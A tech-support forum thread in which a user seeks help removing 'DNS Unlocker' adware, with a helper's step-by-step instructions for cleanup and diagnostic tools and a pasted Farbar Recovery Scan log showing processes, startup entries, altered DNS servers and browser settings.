Tech Support Guy banner
  • IMPORTANT: Only authorized members may reply to threads in this forum due to the complexity of the malware removal process. Authorized members include Malware Specialists and Trainees, Administrators, Moderators, and Trusted Advisors. Regular members are not permitted to reply, and any such posts will be deleted without notice or further explanation. Notice
Status
Not open for further replies.

Can not get rid of "DNS Unlocker"

In Progress 
2K views 22 replies 2 participants last post by  dvk01 
#1 ·
I m unable to get rid of this AdWare called DNS Unlocker. I have cleaned my computer multiple times, have gotten new Anti Virus protection, and removed a file containing some of the adwares data. Yet i am still unable to this of of my computer. Any help is appreciated.
 
#2 ·
step1
Click on this link to download : ADWCleaner Click on ONE of the Two Blue Download Now buttons That have a blue arrow beside them and save it to your desktop. Do not click on any links in the top Advert.

See the screenshot where the proper download buttons are highlighted


NOTE: If using Internet Explorer and you get an alert that stops the program downloading click on Tools > Smartscreen Filter > Turn off Smartscreen Filter then click on OK in the box that opens. Then click on the link again.

Close your browser and double click on this icon on your desktop:



You will then see the screen below, click on the Scan button (as indicated), accept any prompts that appear and allow it to run, it may take several minutes to complete, when it is done, you will get a message saying "PENDING" , Ignore that & click on the Clean button, accept any prompts that appear and allow the system to reboot. You will then be presented with the report, Copy & Paste it into your next post.
Please note: the newer versions of Adwcleaner have a pretty colour display on some versions of windows and slightly different icons. The screenshots are from the older version but are basically the same

 
#3 ·
I have already use this method and it has failed to work multiple times. On my gaming software named "Steam", there is a folder named htmlcache and when this folder is deleted it reinstalls itself back into the primary file. Im not sure if its disguised as something else or something that cant be removed with normal adware softwares.
 
#7 ·
lets use this then to get the vital system information I need to be able to go on
Download TSG SysInfo It is recommended that you download and run this utility and then include the resulting log in your next reply to provide some basic information about your system that could be helpful in resolving your problem.
 
#8 ·
Here is the log,
Tech Support Guy System Info Utility version 1.0.0.2
OS Version: Microsoft Windows 8.1, 64 bit
Processor: Intel(R) Core(TM) i7-4510U CPU @ 2.00GHz, Intel64 Family 6 Model 69 Stepping 1
Processor Count: 4
RAM: 8122 Mb
Graphics Card: Intel(R) HD Graphics Family, -2016 Mb
Hard Drives: C: Total - 928483 MB, Free - 812502 MB; D: Total - 24340 MB, Free - 2436 MB;
Motherboard: Hewlett-Packard, 22D6
Antivirus: Windows Defender, Disabled
 
#9 ·
OK next step

Please download Farbar Recovery Scan Tool and save it to your Desktop.

Note: You need to download and run the 64 bit version

  • Right click to run as administrator. When the tool opens click Yes to disclaimer.
  • Press Scan button.
  • It will produce a log called FRST.txt in the same directory the tool is run from.
  • Please copy and paste log back here.
  • The first time the tool is run it generates another log (Addition.txt - also located in the same directory as FRST.exe/FRST64.exe). Please also paste that along with the FRST.txt into your reply.
 
#12 ·
I have found a software that finds out where the DNS Unlocker has installed its self. But sadly the software requires a paid membership for the program to "rid" the programs but im unsure if this is true. And i used that website hoping i would not encounter the same results the first time i tried but we see how that turned out.
Computer Font Rectangle Operating system Screenshot
 
#13 · (Edited)
First half of main log:
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:30-04-2016
Ran by xains_000 (administrator) on PERSONAL (01-05-2016 06:52:58)
Running from C:\Users\xains_000\Downloads
Loaded Profiles: xains_000 & (Available Profiles: Christina & xains_000)
Platform: Windows 8.1 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: Chrome)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(Softex Inc.) C:\Program Files\Hewlett-Packard\SimplePass\OmniServ.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkAudioService64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVBg64.exe
(Microsoft Corporation) C:\Windows\System32\wlanext.exe
(Adobe Systems Incorporated) C:\Program Files (x86)\Common Files\Adobe\Adobe Desktop Common\ElevationManager\AdobeUpdateService.exe
(Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
(Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
(Microsoft Corporation) C:\Program Files\Microsoft Office 15\ClientX64\officeclicktorun.exe
(Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\DragonAssistant3\DragonAssistantMaintenance.exe
(Intel(R) Corporation) C:\Program Files\Intel\WiFi\bin\EvtEng.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPWMISVC.exe
(Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
(Intel(R) Corporation) C:\Program Files\Intel\BCA\pabeSvc64.exe
() C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTAgent.exe
(McAfee, Inc.) C:\Program Files (x86)\McAfee\SiteAdvisor\mcsacore.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\SystemCore\mfemms.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(McAfee, Inc.) C:\Windows\System32\mfevtps.exe
(Intel Security, Inc.) C:\Program Files\Common Files\Intel Security\PEF\CORE\PEFService.exe
(Intel(R) Corporation) C:\Program Files\Common Files\Intel\WirelessCommon\RegSrvc.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McAfee.TrueKey.Service.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\AMCore\mcshield.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\SystemCore\mfefire.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McAfee.TrueKey.ServiceHelper.exe
(Intel® Corporation) C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe
(McAfee, Inc.) C:\Program Files\McAfee\MSC\McAPExe.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\Platform\McSvcHost\McSvHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\SystemCore\mfefire.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
(Intel Corporation) C:\Windows\System32\igfxTray.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
() C:\Program Files\Hewlett-Packard\SimplePass\opvapp.exe
(Microsoft Corporation) C:\Windows\System32\SkyDrive.exe
(CyberLink Corp.) C:\Program Files (x86)\CyberLink\YouCam\YouCamService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe
(Hewlett-Packard) C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTsysTray8.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerSt.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\Platform\McUICnt.exe
(WildTangent) C:\Program Files (x86)\WildTangent Games\App\GamesAppIntegrationService.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\HP Support Solutions\HPSupportSolutionsFrameworkService.exe
(Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\LMS\LMS.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\CSP\1.9.656.0\McCSPServiceHost.exe
(McAfee, Inc.) C:\Program Files\Common Files\mcafee\ModuleCore\ModuleCoreService.exe
(McAfee, Inc.) C:\Program Files\TrueKey\McTkSchedulerService.exe
(Enigma Software Group USA, LLC.) C:\Program Files\Enigma Software Group\SpyHunter\SpyHunter4.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_21_0_0_213.exe
(Adobe Systems, Inc.) C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerPlugin_21_0_0_213.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamservice.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Program Files (x86)\Malwarebytes Anti-Malware\mbam.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [7569624 2014-04-03] (Realtek Semiconductor)
HKLM\...\Run: [SimplePass] => C:\Program Files\Hewlett-Packard\SimplePass\ClientCore.exe [3962936 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBroker] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBroker.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [OPBHOBrokerDesktop] => C:\Program Files\Hewlett-Packard\SimplePass\OPBHOBrokerDsktop.exe [415288 2014-03-28] (Hewlett-Packard)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2817776 2014-04-11] (Synaptics Incorporated)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508128 2016-03-22] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AccelerometerSysTrayApplet] => C:\Program Files (x86)\Hewlett-Packard\HP 3D DriveGuard\AccelerometerST.exe [126240 2014-02-13] (Hewlett-Packard Company)
HKLM-x32\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\\isuspm.exe [2075480 2013-06-24] (Flexera Software LLC.)
HKLM-x32\...\Run: [HPMessageService] => C:\Program Files (x86)\Hewlett-Packard\HP System Event\HPMSGSVC.exe [475448 2014-03-26] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [Adobe Creative Cloud] => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\ACC\Creative Cloud.exe [2313408 2016-04-07] (Adobe Systems Incorporated)
HKU\S-1-5-18-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\RunOnce: [Application Restart #0] => C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe [349680 2014-07-20] (Microsoft Corporation)
HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Pokki] => C:\Windows\system32\rundll32.exe "%LOCALAPPDATA%\Pokki\Engine\Launcher.dll",RunLaunchPlatform
HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Dropbox Update] => C:\Users\Christina\AppData\Local\Dropbox\Update\DropboxUpdate.exe [136048 2015-09-29] (Dropbox, Inc.)
HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [GoogleChromeAutoLaunch_511A76B83AC02D1275C0A9D3B9873290] => C:\Users\Christina\AppData\Local\Chromium\Application\chrome.exe [667136 2015-08-11] (The Chromium Authors)
HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3077712 2016-03-31] (Valve Corporation)
HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\MountPoints2: {d42dc50e-9608-11e4-8260-f816544bfe14} - "E:\VZW_Software_upgrade_assistant.exe"
HKU\S-1-5-21-2829069514-779319184-155462201-1004\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3077712 2016-03-31] (Valve Corporation)
HKU\S-1-5-21-2829069514-779319184-155462201-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\...\Run: [Steam] => C:\Program Files (x86)\Steam\steam.exe [3077712 2016-03-31] (Valve Corporation)
HKU\S-1-5-18\...\RunOnce: [Application Restart #0] => C:\Program Files\Common Files\microsoft shared\ink\TabTip.exe [349680 2014-07-20] (Microsoft Corporation)
Lsa: [Notification Packages] scecli C:\Program Files\TrueKey\McAfeeTrueKeyPasswordFilter
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-04-01] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-04-01] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-04-01] ()
ShellIconOverlayIdentifiers: ["DropboxExt1"] -> {FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt2"] -> {FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt3"] -> {FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt4"] -> {FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt5"] -> {FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt6"] -> {FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt7"] -> {FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => No File
ShellIconOverlayIdentifiers: ["DropboxExt8"] -> {FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => No File
Startup: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ISCTSystray.lnk [2014-07-20]
ShortcutTarget: ISCTSystray.lnk -> C:\Program Files\Intel\Intel(R) Smart Connect Technology Agent\iSCTsysTray8.exe (Intel Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\Parameters: [NameServer] 82.163.142.7 95.211.158.134
Tcpip\..\Interfaces\{D081BAA5-D4ED-490D-8CC1-86092B422D9B}: [DhcpNameServer] 192.168.0.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = about:Tabs
HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://js.redirect.hp.com/jumpstation?bd=all&c=143&locale=ww_ww&pf=cnnb&s=ieHPtab&tp=iehome
HKU\S-1-5-21-2829069514-779319184-155462201-1004\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2829069514-779319184-155462201-1004\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-2829069514-779319184-155462201-1004\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://js.redirect.hp.com/jumpstation?bd=all&c=143&locale=ww_ww&pf=cnnb&s=ieHPtab&tp=iehome
HKU\S-1-5-21-2829069514-779319184-155462201-1004\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://js.redirect.hp.com/jumpstation?bd=all&c=143&locale=ww_ww&pf=cnnb&s=ieHPtab&tp=iehome
HKU\S-1-5-21-2829069514-779319184-155462201-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2829069514-779319184-155462201-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://g.msn.com/HPNOT14/1
HKU\S-1-5-21-2829069514-779319184-155462201-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Secondary Start Pages = hxxp://js.redirect.hp.com/jumpstation?bd=all&c=143&locale=ww_ww&pf=cnnb&s=ieHPtab&tp=iehome
HKU\S-1-5-21-2829069514-779319184-155462201-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0\Software\Microsoft\Internet Explorer\Main,Default_Secondary_Page_URL = hxxp://js.redirect.hp.com/jumpstation?bd=all&c=143&locale=ww_ww&pf=cnnb&s=ieHPtab&tp=iehome
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKLM -> {9C03A414-F5BB-4A85-898C-2D1B48330C4E} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKLM-x32 -> {9C03A414-F5BB-4A85-898C-2D1B48330C4E} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldstr_15_53&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0FzztCyCyDyEyE0B0F0EtCyEyE0CzyzytN0D0Tzu0StCyEyDyBtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyC0Czy0CyB0ByD0DtGyEtByByCtG0CtB0B0FtGtDtCzzzytGtAyCtAyEtBtCyEzyyCtAtDzy2QtN1M1F1B2Z1V1N2Y1L1Qzu2StDyB0A0FtA0A0CtCtGtDzzzyzztGyE0CyCtAtGzy0F0DtDtGtCtAyEzzyDyCtBtBtCtA0B0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D1226799016%26a%3Dwbf_dnldstr_15_53%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = hxxps://us.search.yahoo.com/yhs/search?hspart=iry&hsimp=yhs-fullyhosted_003&type=wbf_dnldstr_15_53&param1=1&param2=f%3D4%26b%3DIE%26cc%3Dus%26pa%3DWincy%26cd%3D2XzuyEtN2Y1L1Qzu0FzztCyCyDyEyE0B0F0EtCyEyE0CzyzytN0D0Tzu0StCyEyDyBtN1L2XzutAtFtCyCtFtCtFtDtN1L1Czu1StN1L1G1B1V1N2Y1L1Qzu2SyC0Czy0CyB0ByD0DtGyEtByByCtG0CtB0B0FtGtDtCzzzytGtAyCtAyEtBtCyEzyyCtAtDzy2QtN1M1F1B2Z1V1N2Y1L1Qzu2StDyB0A0FtA0A0CtCtGtDzzzyzztGyE0CyCtAtGzy0F0DtDtGtCtAyEzzyDyCtBtBtCtA0B0D2QtN0A0LzuyEtN1B2Z1V1T1S1NzutCtBzyyB%26cr%3D1226799016%26a%3Dwbf_dnldstr_15_53%26os_ver%3D6.3%26os%3DWindows%2B8.1&p={searchTerms}
SearchScopes: HKU\S-1-5-21-2829069514-779319184-155462201-1001-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {9C03A414-F5BB-4A85-898C-2D1B48330C4E} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-2829069514-779319184-155462201-1004 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKU\S-1-5-21-2829069514-779319184-155462201-1004 -> {9C03A414-F5BB-4A85-898C-2D1B48330C4E} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
SearchScopes: HKU\S-1-5-21-2829069514-779319184-155462201-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {2f23ab71-4ac6-41f2-a955-ea576e553146} URL =
SearchScopes: HKU\S-1-5-21-2829069514-779319184-155462201-1004-{ED1FC765-E35E-4C3D-BF15-2C2B11260CE4}-0 -> {9C03A414-F5BB-4A85-898C-2D1B48330C4E} URL = hxxp://www.amazon.com/s/ref=azs_osd_iea?ie=UTF-8&tag=hp-us2-vsb-20&link%5Fcode=qs&index=aps&field-keywords={searchTerms}
BHO: Skype for Business Browser Helper -> {31D09BA0-12F5-4CCE-BE8A-2923E76605DA} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\OCHelper.dll [2016-03-07] (Microsoft Corporation)
BHO: Microsoft SkyDrive Pro Browser Helper -> {D0498E0A-45B7-42AE-A9AA-ABA463DBD3BF} -> C:\Program Files\Microsoft Office 15\root\VFS\ProgramFilesX64\Microsoft Office\Office15\GROOVEEX.DLL [2016-03-07] (Microsoft Corporation)
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
BHO-x32: True Key Helper -> {0F4B8786-5502-4803-8EBC-F652A1153BB6} -> C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2016-04-25] (Intel Security)
BHO-x32: Evernote extension -> {92EF2EAD-A7CE-4424-B0DB-499CF856608E} -> C:\Program Files (x86)\Evernote\Evernote\EvernoteIE.dll [2014-03-04] (Evernote Corp., 305 Walnut Street, Redwood City, CA 94063)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2016-02-17] (HP)
Toolbar: HKLM-x32 - True Key - {4BAAC1B8-0800-42C9-8FA6-08B211F356B8} - C:\Program Files\Intel Security\True Key\MSIE\truekey_ie.dll [2016-04-25] (Intel Security)
DPF: HKLM-x32 {F402241B-FBF9-4178-B44F-FA7F3C332FF1} hxxp://collaborate.54sd.com/WebResource.axd?d=XmFS3HqoHBLz_8qNfE1FvOfcTx4NqwEl4WLlGXH3JIgjxwtvN_TONv8_5dseWdo3rVNy1PXaIMqXIbFbEUODPdcNnOtQ9gx0RZmyAIRIqrygn7r1HgHOhWqRa22DgUgStqpVNSTmaZs73DNpJYY07PZsC9Y1&t=635401717280000000
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-04-20] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-04-20] (McAfee, Inc.)
Handler-x32: osf - {D924BDC6-C83A-4BD5-90D0-095128A113D1} - C:\Program Files\Microsoft Office 15\root\Office15\MSOSB.DLL [2015-10-21] (Microsoft Corporation)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2016-04-20] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2016-04-20] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\McAfee\MSC\McSnIePl64.dll [2016-03-31] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\MSC\McSnIePl.dll [2016-03-31] (McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\xains_000\AppData\Roaming\Mozilla\Firefox\Profiles\scmy1ljp.default
FF DefaultSearchEngine.US: Google
FF Homepage: hxxp://google.com/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_21_0_0_213.dll [2016-04-26] ()
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2016-03-31] ()
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll [2016-04-07] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_21_0_0_213.dll [2016-04-26] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\windows\SysWOW64\Adobe\Director\np32dsw_1204144.dll [2013-09-05] (Adobe Systems, Inc.)
FF Plugin-x32: @Intel-webapi.intel.com/Intel WebAPI ipt;version=4.0.5 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @Intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2013-12-10] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [2016-03-31] ()
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\Program Files\Microsoft Office 15\root\Office15\NPSPWRAP.DLL [2015-01-03] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-05-01] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-05-01] (Google Inc.)
FF Plugin-x32: @WildTangent.com/GamesAppPresenceDetector,Version=1.0 -> C:\Program Files (x86)\WildTangent Games\App\BrowserIntegration\Registered\0\NP_wtapp.dll [2013-08-05] ()
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect32.dll [2016-04-07] (Adobe Systems)
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2016-05-01]
FF Extension: Twitter App - C:\Users\xains_000\AppData\Roaming\Mozilla\Firefox\Profiles\scmy1ljp.default\Extensions\{12b6fdcd-4423-4276-82a3-73fdbff5f7e4}.xpi [2016-05-01]
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi

